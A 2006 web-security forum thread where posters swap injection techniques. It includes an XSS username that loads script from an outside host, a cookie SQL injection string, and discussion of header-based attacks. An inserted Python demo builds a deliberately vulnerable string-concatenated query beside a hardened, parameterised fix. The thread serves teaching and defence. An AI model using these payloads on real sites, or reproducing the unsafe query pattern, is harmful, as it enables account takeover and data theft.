How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Injection Techniques
Posted by: digi7al64
Date: September 04, 2006 01:16AM

Ok, we seem to be doing a lot of talking about XSS and SQL in the injection arena, so I would like to get a thread going on some of the various attack techniques you might have used to break the system. Common or uncommon, I would like to hear about them, as well as (if possible) any security measures that might have already been in place.

I'll start.
What - XSS as a username
How - Created an account with the username "Digi7al64<script src=http://www.site.com/evil.js></script>" (remove quotes)
Security - Regexes everywhere. In fact the entire site (sans username) was invulnerable to injection (XSS and SQL). Use of quotes (single and double) also filtered to stop SQL injection in the username.
About - Chose to use a script src as it allowed me to control what was being run without having to re-inject.

What - SQL injection in a cookie "' or 1=1--asdfasdfasfasfasdfsdfa"
How - Modified cookie data to include sql injection.
Security - Use of pre-built PHP functions to stop injections used everywhere except when comparing cookie values (which were stored as md5 hashes).
About - Coder had expected the string length to be exactly 32 chars long and only checked for that.


Ok, so I know they aren't earth shattering, but it's something simple to get the thread started.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'
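The second technique above comes down to one weak check: the cookie was accepted as long as it was exactly 32 characters, which an injection string padded to 32 characters satisfies just as well as an md5 digest does. The following is an added example (not code from this thread or from the site being described) that reconstructs that check in Python with an in-memory SQLite table; the table, the "hello" token and the padded payload are constructed for the demo, and the hardened version both requires 32 hex characters and binds the value as a query parameter.

```python
import hashlib
import re
import sqlite3

# An md5 digest is exactly 32 lowercase hex characters, nothing else.
MD5_RE = re.compile(r"[0-9a-f]{32}")


def weak_check(cookie: str) -> bool:
    """Mirrors the check described in the post: only the length is tested."""
    return len(cookie) == 32


def strict_check(cookie: str) -> bool:
    """Accept only a well-formed md5 hex digest."""
    return MD5_RE.fullmatch(cookie) is not None


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one session whose cookie is md5("hello").
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (token_md5 TEXT, username TEXT)")
    db.execute("INSERT INTO sessions VALUES (?, ?)",
               (hashlib.md5(b"hello").hexdigest(), "alice"))
    db.commit()
    return db


def lookup_unsafe(db: sqlite3.Connection, cookie: str):
    # The length check is the only barrier; the cookie is then pasted into SQL.
    if not weak_check(cookie):
        return None
    row = db.execute(
        f"SELECT username FROM sessions WHERE token_md5 = '{cookie}'").fetchone()
    return row[0] if row else None


def lookup_safe(db: sqlite3.Connection, cookie: str):
    # Hardened: validate the format, then bind the value instead of concatenating.
    if not strict_check(cookie):
        return None
    row = db.execute(
        "SELECT username FROM sessions WHERE token_md5 = ?", (cookie,)).fetchone()
    return row[0] if row else None


# Constructed payload in the shape the post describes, padded out to 32 chars.
PAYLOAD = "' or 1=1--" + "a" * 22


def demo() -> dict:
    db = make_db()
    return {"weak": lookup_unsafe(db, PAYLOAD), "strict": lookup_safe(db, PAYLOAD)}
```

`demo()` returns `{"weak": "alice", "strict": None}`: the length-only check lets the padded payload through and the string-built query logs the attacker in as the first row, while the hardened lookup rejects it before any SQL runs.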

Re: Injection Techniques
Posted by: rsnake
Date: September 04, 2006 01:41PM

Something I haven't seen much talk about is cookie manipulation to generate XSS. I think the main reason is there hasn't been a viable attack vector until recently (the Flash header spoofing + Expect vulnerability). However, I've found a lot of applications that rely on cookies (and HTTP User_Agent strings) to do database lookups or write to logs that are later used by administrators.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Injection Techniques
Posted by: yawnmoth
Date: September 04, 2006 04:57PM

Except the Expect vulnerability doesn't use cookies - it just requires the Expect header be present, afaik.

Also, scripts that log the User_Agent header (or the Referer header) and re-output it in an HTML doc have (often) been vulnerable to XSS long before the possibility of Flash header spoofing was realized.

Ultimately, I don't think manipulating cookies to produce XSS is all that ground-breaking...

Re: Injection Techniques
Posted by: rsnake
Date: September 04, 2006 06:21PM

yawnmoth, yes, that's true, but you can use JavaScript to write cookies and those cookies can contain information used in SQL queries (you can get other users of the same system to run your SQL injection for you). ;) You're right, I wouldn't call it ground breaking, but not a lot of people are doing it - in part because of the reasons I mentioned above. I was just making an off hand comment.

I was talking about User_Agent as an aside, not as something requiring Flash header spoofing.

- RSnake
Gotta love it. http://ha.ckers.org
